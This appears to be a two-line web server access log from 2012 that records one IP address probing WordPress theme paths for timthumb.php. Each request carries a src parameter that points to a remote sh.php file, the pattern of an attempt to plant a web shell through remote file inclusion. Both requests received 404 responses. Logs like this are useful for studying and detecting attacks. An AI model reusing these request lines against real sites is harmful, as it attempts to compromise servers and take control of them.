95.167.173.166 - - [14/May/2012:04:34:34 +0200] "GET //wp-content/themes/coda/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:04:34:35 +0200] "GET //wp-content/themes/coda/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
